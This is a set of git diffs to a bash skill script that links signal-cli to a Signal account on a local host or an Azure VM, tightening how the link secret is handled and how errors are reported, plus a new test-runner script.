@@ -165,32 +152,15 @@ if [ -z "$MODE" ]; then
     MODE="remote"
   fi
 fi
-
 NAME="amplihack-$HOST"
 UNIT="sig-link-$HOST"
 DAEMON_UNIT="sig-daemon-$HOST"
-
-# Secret handling: the minted sgnl:// link URI is a short-lived provisioning
-# secret and the -vv trace log can capture identity material. Restrict every
-# byte we write:
-#   * umask 077 covers files this script writes directly.
-#   * The URI_FILE / LOG_FILE secrets are written by a redirect INSIDE the
-#     systemd-run transient unit, which does NOT inherit this umask (systemd
-#     defaults to UMask=0022). We therefore pin the unit's UMask explicitly via
-#     `--property=UMask=0077` on both systemd-run calls so those files are
-#     0600 from birth. See SECURITY.md §4.
-#   * Unguessable, per-run path suffix (defeats /tmp symlink pre-creation and
-#     disclosure to other local users on a predictable path).
-#   * Trap-based cleanup on exit.
+# Secret paths use an unguessable per-run token; systemd units pin UMask=0077.
 umask 077
-RUN_TOKEN="$(date +%s)-$$-${RANDOM}${RANDOM}"
+RUN_TOKEN="${EPOCHSECONDS}-$$-${RANDOM}${RANDOM}"
 URI_FILE="/tmp/slink-${HOST}-${RUN_TOKEN}.out"
 LOG_FILE="/tmp/scli-${HOST}-${RUN_TOKEN}.log"
-# Local daemon log — routed through the same unguessable token so it is not a
-# predictable /tmp path (defeats symlink pre-creation) and is covered by the
-# cleanup trap alongside the other secrets. See SECURITY.md §4.
 DAEMON_LOG="/tmp/signal-daemon-${HOST}-${RUN_TOKEN}.log"
-
 cleanup_secrets() {
   if [ "$MODE" = "local" ]; then
     rm -f "$URI_FILE" "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
@@ -200,9 +170,7 @@ cleanup_secrets() {
   fi
 }
 trap cleanup_secrets EXIT INT TERM
-
 info "=== signal-setup: host=$HOST mode=$MODE unit=$UNIT ==="
-
 # --------------------------------------------------------------------------- #
 # Step 1: Prerequisites
 # --------------------------------------------------------------------------- #
@@ -211,10 +179,10 @@ check_prereqs_local() {
   [ -x "$SIGNAL_CLI" ] || die "signal-cli not found/executable at $SIGNAL_CLI (known-good: 0.14.5 at ~/.local/opt/signal-cli-0.14.5/bin/signal-cli symlinked to ~/.local/bin/signal-cli)"
   command -v qrencode >/dev/null 2>&1 || die "qrencode not installed (apt-get install -y qrencode)"
   command -v systemd-run >/dev/null 2>&1 || die "systemd-run not available on this host"
+  sudo -n true >/dev/null 2>&1 || die "passwordless sudo is required for the local systemd-run link unit"
   ok "  signal-cli: $("$SIGNAL_CLI" --version 2>/dev/null || echo present)"
   ok "  qrencode + systemd-run present"
 }
-
 check_prereqs_remote() {
   info "[1/6] Checking prerequisites (remote: $HOST)..."
   command -v az >/dev/null 2>&1 || die "az CLI not installed (required for remote hosts)"
@@ -233,7 +201,6 @@ check_prereqs_remote() {
   esac
   ok "  remote signal-cli + systemd-run present; local qrencode present"
 }
-
 # --------------------------------------------------------------------------- #
 # Step 2: Idempotency — already linked?
 # --------------------------------------------------------------------------- #
@@ -254,13 +221,18 @@ already_linked() {
   # a genuine probe FAILURE (return 2 above). "Probe succeeded, not linked yet"
   # is success with empty output, so force an explicit return 0 below.
   if [ -n "$PHONE" ]; then
-    [[ "$accounts" == *"Number: $PHONE"* ]] && printf '%s' "$PHONE"
+    # Match the WHOLE extracted number, not a substring. A bare
+    # `*"Number: $PHONE"*` test collides on prefixes: a host linked to
+    # +155512345678 would falsely match --phone +15551234567, skip minting,
+    # and then drive the daemon/send steps with the wrong (unlinked) number.
+    printf '%s\n' "$accounts" \
+      | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' \
+      | grep -qxF "$PHONE" && printf '%s' "$PHONE"
   else
     printf '%s\n' "$accounts" | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' | head -n1
   fi
   return 0
 }
-
 # --------------------------------------------------------------------------- #
 # Step 3: Mint the link URI under a transient systemd unit
 # --------------------------------------------------------------------------- #
@@ -281,7 +253,7 @@ mint_local() {
       bash "$SIGNAL_CLI" "$LOG_FILE" "$NAME" "$URI_FILE" \
     >/dev/null 2>&1
   local _i
-  for ((_i = 1; _i <= 20; _i++)); do
+  for ((_i = 1; _i <= DAEMON_WAIT_ATTEMPTS; _i++)); do
     grep -q '^sgnl://' "$URI_FILE" 2>/dev/null && break
     sleep 0.5
   done
@@ -297,17 +269,22 @@ umask 077
 systemctl reset-failed $UNIT 2>/dev/null
 systemctl stop $UNIT 2>/dev/null
 rm -f $URI_FILE $LOG_FILE
-systemd-run --unit=$UNIT --uid=azureuser --gid=azureuser \
+launch_out=\$(systemd-run --unit=$UNIT --uid=azureuser --gid=azureuser \
   --property=UMask=0077 \
   --setenv=HOME=/home/azureuser \
   --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
-  /bin/bash -c '$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1' >/dev/null 2>&1
-for i in \$(seq 1 20); do grep -q '^sgnl://' $URI_FILE 2>/dev/null && break; sleep 0.5; done
+  /bin/bash -c '$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1' 2>&1)
+launch_rc=\$?
+if [ "\$launch_rc" -ne 0 ]; then echo LINK_LAUNCH_FAILED; echo "\$launch_out"; exit 0; fi
+for i in \$(seq 1 $DAEMON_WAIT_ATTEMPTS); do grep -q '^sgnl://' $URI_FILE 2>/dev/null && break; sleep 0.5; done
 echo URI_START; grep -m1 '^sgnl://' $URI_FILE 2>/dev/null; echo URI_END
 REMOTE
 )"
   # Capture FULL output first (SIGPIPE gotcha), then extract.
   out="$(remote_run "$script")" || return 1
+  case "$out" in
+    *LINK_LAUNCH_FAILED*) printf '%s\n' "$out" >&2; return 1 ;;
+  esac
   printf '%s\n' "$out" | sed -n 's/.*URI_START//p; /sgnl:\/\//p' | grep -m1 '^sgnl://'
 }
 
@@ -316,9 +293,12 @@ REMOTE
 # --------------------------------------------------------------------------- #
 verify_linkage() {
   info "[4/6] Verifying linkage (up to ${WINDOW_SECONDS}s)..."
-  local num unit_state deadline now
-  deadline="$(($(date +%s) + WINDOW_SECONDS))"
-  while [ "$(date +%s)" -lt "$deadline" ]; do
+  # $EPOCHSECONDS is a fork-free bash builtin; using it instead of $(date +%s)
+  # avoids ~2 subprocess forks per poll (~110 over the full window) in this hot
+  # loop without changing behaviour.
+  local num unit_state deadline
+  deadline=$(( EPOCHSECONDS + WINDOW_SECONDS ))
+  while (( EPOCHSECONDS < deadline )); do
     num="$(already_linked)" || { warn "  Could not query linked accounts yet; retrying."; num=""; }
     if [ -n "$num" ]; then
       # The transient unit exits (inactive) on success.
@@ -331,8 +311,7 @@ verify_linkage() {
       [ -z "$PHONE" ] && PHONE="$num"
       return 0
     fi
-    now="$(date +%s)"
-    [ "$now" -lt "$deadline" ] || break
+    (( EPOCHSECONDS < deadline )) || break
     sleep 1
   done
   err "  No linked account detected within the window."
@@ -348,35 +327,42 @@ remote_daemon_group_posttest() {
   local sigcli="$1" acct_j group_j script out
   acct_j="$(json_escape "$PHONE")"
   group_j="$(json_escape "$GROUP_NAME")"
+  # Honour the validated SIGNAL_SETUP_DAEMON_TCP override on the remote path too.
+  # Both values passed validation (loopback host + numeric 1-65535 port), so
+  # they are safe to interpolate into the run-command payload. Previously the
+  # remote heredoc hardcoded 127.0.0.1:7583, so a non-default override worked
+  # locally but was silently ignored remotely (while [5/6] still printed the
+  # unused $DAEMON_TCP).
   script="$(cat <<REMOTE
-daemon_up() { (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null; }
+daemon_up() { (exec 3<>/dev/tcp/$DAEMON_TCP_HOST/$DAEMON_TCP_PORT) 2>/dev/null; }
 if ! daemon_up; then
   systemctl reset-failed $DAEMON_UNIT 2>/dev/null
   systemd-run --unit=$DAEMON_UNIT --uid=azureuser --gid=azureuser \
     --setenv=HOME=/home/azureuser \
     --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
-    $sigcli -a '$acct_j' daemon --tcp 127.0.0.1:7583 >/dev/null 2>&1
-  for i in \$(seq 1 20); do daemon_up && break; sleep 0.5; done
+    $sigcli -a '$acct_j' daemon --tcp $DAEMON_TCP_HOST:$DAEMON_TCP_PORT >/dev/null 2>&1
+  for i in \$(seq 1 $DAEMON_WAIT_ATTEMPTS); do daemon_up && break; sleep 0.5; done
 fi
 daemon_up || { echo DAEMON_DOWN; exit 0; }
 command -v nc >/dev/null 2>&1 || { echo NC_MISSING; exit 0; }
-resp=\$(printf '%s\n' '{"jsonrpc":"2.0","method":"updateGroup","params":{"account":"$acct_j","name":"$group_j"},"id":1}' | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)
+resp=\$(printf '%s\n' '{"jsonrpc":"2.0","method":"updateGroup","params":{"account":"$acct_j","name":"$group_j"},"id":1}' | timeout $RPC_TIMEOUT_SECONDS nc $DAEMON_TCP_HOST $DAEMON_TCP_PORT 2>/dev/null | head -n1)
 group_id=\$(printf '%s' "\$resp" | sed -n 's/.*"groupId":"\([^"]*\)".*/\1/p')
 [ -n "\$group_id" ] || { echo GROUP_ID_MISSING; echo "\$resp"; exit 0; }
-resp=\$(printf '{"jsonrpc":"2.0","method":"send","params":{"account":"$acct_j","groupId":"%s","message":"amplihack signal-setup: link verified"},"id":1}\n' "\$group_id" | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)
+group_id_j=\$(printf '%s' "\$group_id" | sed 's/\\/\\\\/g; s/"/\\"/g')
+resp=\$(printf '{"jsonrpc":"2.0","method":"send","params":{"account":"$acct_j","groupId":"%s","message":"amplihack signal-setup: link verified"},"id":1}\n' "\$group_id_j" | timeout $RPC_TIMEOUT_SECONDS nc $DAEMON_TCP_HOST $DAEMON_TCP_PORT 2>/dev/null | head -n1)
 case "\$resp" in
   *'"results":[]'*) echo POST_TEST_OK ;;
   *) echo POST_TEST_UNKNOWN; echo "\$resp" ;;
 esac
 REMOTE
 )"
-  out="$(remote_run "$script")" || { warn "  Remote daemon/group/post-test failed to run."; return 0; }
+  out="$(remote_run "$script")" || { warn "  Remote daemon/group/post-test failed to run."; return 1; }
   case "$out" in
     *POST_TEST_OK*) ok "  Remote daemon reachable; post-test OK: {\"results\":[],...}" ;;
-    *DAEMON_DOWN*) warn "  Remote daemon did not come up on $DAEMON_TCP; skipping post-test." ;;
-    *NC_MISSING*) warn "  Remote 'nc' not available; skipping JSON-RPC self-group post-test." ;;
-    *GROUP_ID_MISSING*) warn "  Remote updateGroup did not return groupId: $out" ;;
-    *) warn "  Remote post-test response (verify manually): $out" ;;
+    *DAEMON_DOWN*) warn "  Remote daemon did not come up on $DAEMON_TCP."; return 1 ;;
+    *NC_MISSING*) warn "  Remote 'nc' not available; cannot run JSON-RPC self-group post-test."; return 1 ;;
+    *GROUP_ID_MISSING*) warn "  Remote updateGroup did not return groupId: $out"; return 1 ;;
+    *) warn "  Remote post-test response (verify manually): $out"; return 1 ;;
   esac
 }
 
@@ -385,16 +371,16 @@ local_daemon_group_posttest() {
   if ! daemon_up; then
     "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >"$DAEMON_LOG" 2>&1 &
     local _i
-    for ((_i = 1; _i <= 20; _i++)); do
+    for ((_i = 1; _i <= DAEMON_WAIT_ATTEMPTS; _i++)); do
       daemon_up && break
       sleep 0.5
     done
   fi
   daemon_up \
-    || { warn "  Daemon did not come up on $DAEMON_TCP; skipping post-test."; return 0; }
+    || { warn "  Daemon did not come up on $DAEMON_TCP."; return 1; }
   ok "  Daemon reachable on $DAEMON_TCP"
 
-  command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; skipping JSON-RPC self-group post-test."; return 0; }
+  command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; cannot run JSON-RPC self-group post-test."; return 1; }
 
   info "[6/6] Ensuring self-group '$GROUP_NAME' + post-test ..."
   local resp group_id acct_j group_j nc_host nc_port
@@ -402,24 +388,25 @@ local_daemon_group_posttest() {
   acct_j="$(json_escape "$PHONE")"
   group_j="$(json_escape "$GROUP_NAME")"
   resp="$(rpc updateGroup "{\"account\":\"$acct_j\",\"name\":\"$group_j\"}" \
-    | timeout 15 nc "$nc_host" "$nc_port" 2>/dev/null | head -n1)"
+    | timeout "$RPC_TIMEOUT_SECONDS" nc "$nc_host" "$nc_port" 2>/dev/null | head -n1)"
   group_id="$(printf '%s' "$resp" | sed -n 's/.*"groupId":"\([^"]*\)".*/\1/p')"
   if [ -z "$group_id" ]; then
     warn "  Could not obtain groupId from updateGroup response:"
     warn "    $resp"
-    return 0
+    return 1
   fi
   ok "  self-group id: $group_id"
 
   local gid_j
   gid_j="$(json_escape "$group_id")"
   resp="$(rpc send "{\"account\":\"$acct_j\",\"groupId\":\"$gid_j\",\"message\":\"amplihack signal-setup: link verified\"}" \
-    | timeout 15 nc "$nc_host" "$nc_port" 2>/dev/null | head -n1)"
+    | timeout "$RPC_TIMEOUT_SECONDS" nc "$nc_host" "$nc_port" 2>/dev/null | head -n1)"
   # Empty results array is NORMAL/success for a self-only group.
   if printf '%s' "$resp" | grep -q '"results":\[\]'; then
     ok "  Post-test OK: {\"results\":[],...} (empty results = success for self-group)"
   else
     warn "  Post-test response (verify manually): $resp"
+    return 1
   fi
 }
 
@@ -446,7 +433,9 @@ main() {
   if [ -n "$existing" ]; then
     ok "[2/6] Host already linked as $existing — nothing to do (idempotent)."
     [ -z "$PHONE" ] && PHONE="$existing"
-    [ "$DO_DAEMON" -eq 1 ] && daemon_group_posttest
+    if [ "$DO_DAEMON" -eq 1 ]; then
+      daemon_group_posttest || die "Daemon/self-group/post-test failed."
+    fi
     ok "=== signal-setup complete (already linked) ==="
     return 0
   fi
@@ -475,7 +464,12 @@ main() {
   printf '#  SCAN NOW — ~%ss until Signal closes the socket (1001)   #\n' "$WINDOW_SECONDS" >&2
   printf '#  Signal > Linked Devices > Link New Device > scan below   #\n' >&2
   printf '############################################################\n\n' >&2
-  qrencode -t ANSIUTF8i -m "$QR_MARGIN" "$uri"
+  # Feed the secret via STDIN, never argv: passing the sgnl:// URI as a
+  # command-line argument would expose the crown-jewel link secret in
+  # qrencode's argv (visible to other local users via `ps` / /proc/<pid>/cmdline)
+  # for the whole render. qrencode reads the data from stdin when no string
+  # argument is given. printf '%s' avoids appending a newline into the QR data.
+  printf '%s' "$uri" | qrencode -t ANSIUTF8i -m "$QR_MARGIN"
   printf '\n(host=%s unit=%s minted=%s)\n' "$HOST" "$UNIT" "$(date -u +%H:%M:%SZ)" >&2
 
   # The URI is now on-screen; delete the on-disk copy of the secret immediately
@@ -489,7 +483,9 @@ main() {
 
   verify_linkage || die "Linkage not verified. Re-run to mint a fresh QR (the old one has expired)."
 
-  [ "$DO_DAEMON" -eq 1 ] && daemon_group_posttest
+  if [ "$DO_DAEMON" -eq 1 ]; then
+    daemon_group_posttest || die "Daemon/self-group/post-test failed."
+  fi
 
   ok "=== signal-setup complete for $HOST ==="
 }

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -181,10 +181,15 @@ UNIT="sig-link-$HOST"
 # Secret handling: the minted sgnl:// link URI is a short-lived provisioning
 # secret and the -vv trace log can capture identity material. Restrict every
 # byte we write:
-#   * umask 077 so any file we create is owner-only.
+#   * umask 077 covers files this script writes directly.
+#   * The URI_FILE / LOG_FILE secrets are written by a redirect INSIDE the
+#     systemd-run transient unit, which does NOT inherit this umask (systemd
+#     defaults to UMask=0022). We therefore pin the unit's UMask explicitly via
+#     `--property=UMask=0077` on both systemd-run calls so those files are
+#     0600 from birth. See SECURITY.md §4.
 #   * Unguessable, per-run path suffix (defeats /tmp symlink pre-creation and
 #     disclosure to other local users on a predictable path).
-#   * 0600 mode and trap-based cleanup on exit.
+#   * Trap-based cleanup on exit.
 umask 077
 RUN_TOKEN="$(date +%s)-$$-${RANDOM}${RANDOM}"
 URI_FILE="/tmp/slink-${HOST}-${RUN_TOKEN}.out"
@@ -261,6 +266,7 @@ mint_local() {
   sudo systemctl stop "$UNIT" 2>/dev/null
   sudo rm -f "$URI_FILE" "$LOG_FILE"
   sudo systemd-run --unit="$UNIT" --uid=azureuser --gid=azureuser \
+    --property=UMask=0077 \
     --setenv=HOME=/home/azureuser \
     --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
     /bin/bash -c "$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1" \
@@ -283,6 +289,7 @@ systemctl reset-failed $UNIT 2>/dev/null
 systemctl stop $UNIT 2>/dev/null
 rm -f $URI_FILE $LOG_FILE
 systemd-run --unit=$UNIT --uid=azureuser --gid=azureuser \
+  --property=UMask=0077 \
   --setenv=HOME=/home/azureuser \
   --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
   /bin/bash -c '$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1' >/dev/null 2>&1

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -47,6 +47,7 @@ RESOURCE_GROUP="${SIGNAL_SETUP_RG:-rysweet-linux-vm-pool}"
 DAEMON_TCP="127.0.0.1:7583"
 QR_MARGIN=2
 WINDOW_SECONDS=55   # advertise a hair under 60 so the user is never late
+AZ_RUN_TIMEOUT_SECONDS="${SIGNAL_SETUP_AZ_TIMEOUT_SECONDS:-15}"
 
 HOST=""
 PHONE="${SIGNAL_PHONE:-}"
@@ -54,6 +55,7 @@ GROUP_NAME="amplihack"
 MODE=""             # local | remote (auto-detected if empty)
 DO_DAEMON=1
 ASSUME_YES=0
+DAEMON_UNIT=""
 
 export PATH="$HOME/.local/bin:$PATH"
 
@@ -122,7 +124,7 @@ daemon_up() {
 # core-dumps azlin), then returns it for the caller to filter.
 remote_run() {
   local script="$1" out
-  out="$(az vm run-command invoke -g "$RESOURCE_GROUP" -n "$HOST" \
+  out="$(timeout "$AZ_RUN_TIMEOUT_SECONDS" az vm run-command invoke -g "$RESOURCE_GROUP" -n "$HOST" \
     --command-id RunShellScript --scripts "$script" \
     --query 'value[0].message' -o tsv 2>/dev/null)" || return 1
   printf '%s' "$out"
@@ -186,6 +188,7 @@ fi
 
 NAME="amplihack-$HOST"
 UNIT="sig-link-$HOST"
+DAEMON_UNIT="sig-daemon-$HOST"
 
 # Secret handling: the minted sgnl:// link URI is a short-lived provisioning
 # secret and the -vv trace log can capture identity material. Restrict every
@@ -203,10 +206,14 @@ umask 077
 RUN_TOKEN="$(date +%s)-$$-${RANDOM}${RANDOM}"
 URI_FILE="/tmp/slink-${HOST}-${RUN_TOKEN}.out"
 LOG_FILE="/tmp/scli-${HOST}-${RUN_TOKEN}.log"
+# Local daemon log — routed through the same unguessable token so it is not a
+# predictable /tmp path (defeats symlink pre-creation) and is covered by the
+# cleanup trap alongside the other secrets. See SECURITY.md §4.
+DAEMON_LOG="/tmp/signal-daemon-${HOST}-${RUN_TOKEN}.log"
 
 cleanup_secrets() {
   if [ "$MODE" = "local" ]; then
-    rm -f "$URI_FILE" "$LOG_FILE" 2>/dev/null
+    rm -f "$URI_FILE" "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
     sudo rm -f "$URI_FILE" "$LOG_FILE" 2>/dev/null
   else
     remote_run "rm -f $URI_FILE $LOG_FILE" >/dev/null 2>&1
@@ -270,15 +277,20 @@ already_linked() {
 # Step 3: Mint the link URI under a transient systemd unit
 # --------------------------------------------------------------------------- #
 mint_local() {
+  local run_uid run_gid run_home
+  run_uid="$(id -u)"
+  run_gid="$(id -g)"
+  run_home="$HOME"
   systemctl --user reset-failed "$UNIT" 2>/dev/null
   sudo systemctl reset-failed "$UNIT" 2>/dev/null
   sudo systemctl stop "$UNIT" 2>/dev/null
   sudo rm -f "$URI_FILE" "$LOG_FILE"
-  sudo systemd-run --unit="$UNIT" --uid=azureuser --gid=azureuser \
+  sudo systemd-run --unit="$UNIT" --uid="$run_uid" --gid="$run_gid" \
     --property=UMask=0077 \
-    --setenv=HOME=/home/azureuser \
-    --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
-    /bin/bash -c "$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1" \
+    --setenv=HOME="$run_home" \
+    --setenv=PATH="$run_home/.local/bin:/usr/bin:/bin" \
+    /bin/bash -c '"$1" -vv --log-file "$2" link -n "$3" > "$4" 2>&1' \
+      bash "$SIGNAL_CLI" "$LOG_FILE" "$NAME" "$URI_FILE" \
     >/dev/null 2>&1
   local _i
   for ((_i = 1; _i <= 20; _i++)); do
@@ -316,8 +328,9 @@ REMOTE
 # --------------------------------------------------------------------------- #
 verify_linkage() {
   info "[4/6] Verifying linkage (up to ${WINDOW_SECONDS}s)..."
-  local _i num unit_state
-  for ((_i = 1; _i <= WINDOW_SECONDS; _i++)); do
+  local num unit_state deadline now
+  deadline="$(($(date +%s) + WINDOW_SECONDS))"
+  while [ "$(date +%s)" -lt "$deadline" ]; do
     num="$(already_linked)"
     if [ -n "$num" ]; then
       # The transient unit exits (inactive) on success.
@@ -330,6 +343,8 @@ verify_linkage() {
       [ -z "$PHONE" ] && PHONE="$num"
       return 0
     fi
+    now="$(date +%s)"
+    [ "$now" -lt "$deadline" ] || break
     sleep 1
   done
   err "  No linked account detected within the window."
@@ -346,14 +361,47 @@ daemon_group_posttest() {
   info "[5/6] Ensuring JSON-RPC daemon on $DAEMON_TCP ..."
 
   local sigcli
-  if [ "$MODE" = "local" ]; then sigcli="$SIGNAL_CLI"; else
-    warn "  Daemon/group/post-test target the LOCAL machine's daemon."
-    warn "  For a remote-linked host, run these steps on that host separately."
+  if [ "$MODE" = "local" ]; then sigcli="$SIGNAL_CLI"; else sigcli="$SIGNAL_CLI_REMOTE"; fi
+
+  if [ "$MODE" = "remote" ]; then
+    local acct_j group_j script out
+    acct_j="$(json_escape "$PHONE")"
+    group_j="$(json_escape "$GROUP_NAME")"
+    script="$(cat <<REMOTE
+daemon_up() { (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null; }
+if ! daemon_up; then
+  systemctl reset-failed $DAEMON_UNIT 2>/dev/null
+  systemd-run --unit=$DAEMON_UNIT --uid=azureuser --gid=azureuser \
+    --setenv=HOME=/home/azureuser \
+    --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
+    $sigcli -a '$acct_j' daemon --tcp 127.0.0.1:7583 >/dev/null 2>&1
+  for i in \$(seq 1 20); do daemon_up && break; sleep 0.5; done
+fi
+daemon_up || { echo DAEMON_DOWN; exit 0; }
+command -v nc >/dev/null 2>&1 || { echo NC_MISSING; exit 0; }
+resp=\$(printf '%s\n' '{"jsonrpc":"2.0","method":"updateGroup","params":{"account":"$acct_j","name":"$group_j"},"id":1}' | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)
+group_id=\$(printf '%s' "\$resp" | sed -n 's/.*"groupId":"\([^"]*\)".*/\1/p')
+[ -n "\$group_id" ] || { echo GROUP_ID_MISSING; echo "\$resp"; exit 0; }
+resp=\$(printf '{"jsonrpc":"2.0","method":"send","params":{"account":"$acct_j","groupId":"%s","message":"amplihack signal-setup: link verified"},"id":1}\n' "\$group_id" | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)
+case "\$resp" in
+  *'"results":[]'*) echo POST_TEST_OK ;;
+  *) echo POST_TEST_UNKNOWN; echo "\$resp" ;;
+esac
+REMOTE
+)"
+    out="$(remote_run "$script")" || { warn "  Remote daemon/group/post-test failed to run."; return 0; }
+    case "$out" in
+      *POST_TEST_OK*) ok "  Remote daemon reachable; post-test OK: {\"results\":[],...}" ;;
+      *DAEMON_DOWN*) warn "  Remote daemon did not come up on $DAEMON_TCP; skipping post-test." ;;
+      *NC_MISSING*) warn "  Remote 'nc' not available; skipping JSON-RPC self-group post-test." ;;
+      *GROUP_ID_MISSING*) warn "  Remote updateGroup did not return groupId: $out" ;;
+      *) warn "  Remote post-test response (verify manually): $out" ;;
+    esac
     return 0
   fi
 
   if ! daemon_up; then
-    "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >/tmp/signal-daemon-"$HOST".log 2>&1 &
+    "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >"$DAEMON_LOG" 2>&1 &
     local _i
     for ((_i = 1; _i <= 20; _i++)); do
       daemon_up && break

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -229,7 +229,11 @@ already_linked() {
       | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' \
       | grep -qxF "$PHONE" && printf '%s' "$PHONE"
   else
-    printf '%s\n' "$accounts" | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' | head -n1
+    local numbers count
+    numbers="$(printf '%s\n' "$accounts" | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p')"
+    count="$(printf '%s\n' "$numbers" | sed '/^$/d' | wc -l | tr -d ' ')"
+    [ "$count" -le 1 ] || { err "Multiple Signal accounts found; rerun with --phone to choose one."; return 2; }
+    printf '%s\n' "$numbers" | head -n1
   fi
   return 0
 }
@@ -245,13 +249,19 @@ mint_local() {
   sudo systemctl reset-failed "$UNIT" 2>/dev/null
   sudo systemctl stop "$UNIT" 2>/dev/null
   sudo rm -f "$URI_FILE" "$LOG_FILE"
-  sudo systemd-run --unit="$UNIT" --uid="$run_uid" --gid="$run_gid" \
+  local launch_out launch_rc
+  launch_out="$(sudo systemd-run --unit="$UNIT" --uid="$run_uid" --gid="$run_gid" \
     --property=UMask=0077 \
     --setenv=HOME="$run_home" \
     --setenv=PATH="$run_home/.local/bin:/usr/bin:/bin" \
     /bin/bash -c '"$1" -vv --log-file "$2" link -n "$3" > "$4" 2>&1' \
       bash "$SIGNAL_CLI" "$LOG_FILE" "$NAME" "$URI_FILE" \
-    >/dev/null 2>&1
+    2>&1)"
+  launch_rc=$?
+  if [ "$launch_rc" -ne 0 ]; then
+    [ -n "$launch_out" ] && printf '%s\n' "$launch_out" >&2
+    return 1
+  fi
   local _i
   for ((_i = 1; _i <= DAEMON_WAIT_ATTEMPTS; _i++)); do
     grep -q '^sgnl://' "$URI_FILE" 2>/dev/null && break
@@ -259,7 +269,6 @@ mint_local() {
   done
   grep -m1 '^sgnl://' "$URI_FILE" 2>/dev/null
 }
-
 mint_remote() {
   # run-command runs as ROOT, so --uid/--gid=azureuser is REQUIRED so the
   # linked account lands under the azureuser home, not root's.
@@ -287,7 +296,6 @@ REMOTE
   esac
   printf '%s\n' "$out" | sed -n 's/.*URI_START//p; /sgnl:\/\//p' | grep -m1 '^sgnl://'
 }
-
 # --------------------------------------------------------------------------- #
 # Step 4: Verify linkage
 # --------------------------------------------------------------------------- #
@@ -319,7 +327,6 @@ verify_linkage() {
   err "  Look for: 'Associated with: +<phone>' then 'Finishing new device registration'."
   return 1
 }
-
 # --------------------------------------------------------------------------- #
 # Step 5+6: Daemon + self-group + post-test (JSON-RPC on 127.0.0.1:7583)
 # --------------------------------------------------------------------------- #
@@ -365,7 +372,6 @@ REMOTE
     *) warn "  Remote post-test response (verify manually): $out"; return 1 ;;
   esac
 }
-
 local_daemon_group_posttest() {
   local sigcli="$1"
   if ! daemon_up; then
@@ -379,9 +385,7 @@ local_daemon_group_posttest() {
   daemon_up \
     || { warn "  Daemon did not come up on $DAEMON_TCP."; return 1; }
   ok "  Daemon reachable on $DAEMON_TCP"
-
   command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; cannot run JSON-RPC self-group post-test."; return 1; }
-
   info "[6/6] Ensuring self-group '$GROUP_NAME' + post-test ..."
   local resp group_id acct_j group_j nc_host nc_port
   nc_host="${DAEMON_TCP%:*}"; nc_port="${DAEMON_TCP##*:}"

--- a/amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
@@ -1,0 +1,53 @@
+#!/usr/bin/env bash
+# Unified test runner for the signal-setup skill.
+#
+# Usage:
+#   bash amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
+#
+# Exit: 0 = all suites passed, non-zero = one or more failures.
+#
+# Suites:
+#   1. test_skill_structure.sh  — SKILL.md/SECURITY.md contract + script-source
+#                                 invariants (the four hard-won facts, gotchas,
+#                                 security model, idempotency, --host contract).
+#   2. test_script_behavior.sh  — the actual script under a sandboxed HOME with
+#                                 mocked signal-cli/qrencode/systemd-run/az/sudo/nc
+#                                 (help, validation, injection fail-closed,
+#                                 idempotency-renders-no-QR, prereq failures).
+#
+# Intentionally omits -e so one failing suite never aborts the runner.
+set -uo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+SUITES=(
+  "test_skill_structure.sh"
+  "test_script_behavior.sh"
+)
+
+TOTAL_FAIL=0
+echo "###########################################################"
+echo "#  signal-setup skill — full TDD suite"
+echo "###########################################################"
+for s in "${SUITES[@]}"; do
+  echo ""
+  echo ">>> Running $s"
+  if bash "$SCRIPT_DIR/$s"; then
+    echo "<<< $s: OK"
+  else
+    echo "<<< $s: FAILED"
+    TOTAL_FAIL=$((TOTAL_FAIL + 1))
+  fi
+done
+
+echo ""
+echo "###########################################################"
+if [[ "$TOTAL_FAIL" -eq 0 ]]; then
+  echo "#  ALL SUITES PASSED"
+else
+  echo "#  $TOTAL_FAIL SUITE(S) FAILED"
+fi
+echo "###########################################################"
+
+[[ "$TOTAL_FAIL" -gt 0 ]] && exit 1
+exit 0

